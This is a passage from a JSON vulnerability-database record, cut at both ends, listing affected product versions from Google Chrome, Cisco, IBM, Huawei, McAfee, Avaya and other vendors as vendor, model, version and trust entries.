"version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.116" }, { "model": "cloud single sign on", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.19" }, { "model": "secureplatform r75.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.371.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.107" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.1.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.615.0" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.51" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.102" }, { "model": "ios-xe for catalyst 4k", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.12" }, { "model": "oceanstor hvs85t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.92" }, { "model": "system networking san24b-5 2498-f24", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.50" }, { "model": "associates layer mobile access gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "telepresence ip gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.28" }, { "model": "oceanstor s5600t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.873.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.794.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.40" }, { "model": "oceanstor s5600t v200r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.781.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1298.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.18" }, { "model": "secureplatform r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.72" }, { "model": "oceanstor v100r001c10", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "9000" }, { "model": "secureplatform r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.9.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.554.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.08.0.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.631.0" }, { "model": "ios-xe for asr903", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "move scheduler", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "ediscovery identification and collection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.477.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.941.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "secureplatform r75", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.516.0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.430.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.457.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1008.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.943.0" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.21" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.609.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.211.0" }, { "model": "ios-xe for isr4400", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.42" }, { "model": "t5565 thin client hp t5565z smart client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "nvp", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.582.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.589.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.575.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.26" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "media experience engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "message networking sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1280.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "3722-s52", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.39" }, { "model": "vcenter orchestrator appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.726.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1034.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.36" }, { "model": "algo risk service on cloud", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "oceanstor s5800t v200r002c20", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "gaia embedded r71.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.32" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.716.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.480.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.700.0" }, { "model": "associates application performance management cloud monitor", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "oceanstor s5600t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.28" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.5" }, { "model": "oceanstor s6800t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh628 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.21" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "oceanstor s5800t v200r002c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1652.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.6" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.627.0" }, { "model": "network convergence system series routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60005.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.4" }, { "model": "gaia r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.28" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.19" }, { "model": "e9000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "session border controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.826.0" }, { "model": "oceanstor hdp3500e v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.581.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.544.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.130" }, { "model": "ipso r77", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1041" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.42" }, { "model": "mds", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.336.0" }, { "model": "storeever esl g3 tape library 665h gs12501", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "associates layer api gateway", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.124" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.922.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.21" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.910.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.149" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1686.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "firewall enterprise control center", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "5.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.671.0" }, { "model": "bsc6000 v900r008c15", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.66" }, { "model": "oceanstor s2600 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.68" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.424.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.39" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.898.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.478.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.540.0" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.57" }, { "model": "system storage san384b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-192" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "67000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.46" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1004.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.136" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.821.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.212.1" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.492.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.33" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.923.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.948.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.114" }, { "model": "rack server rh2288h v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1024.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.784.0" }, { "model": "chrome", "scope": 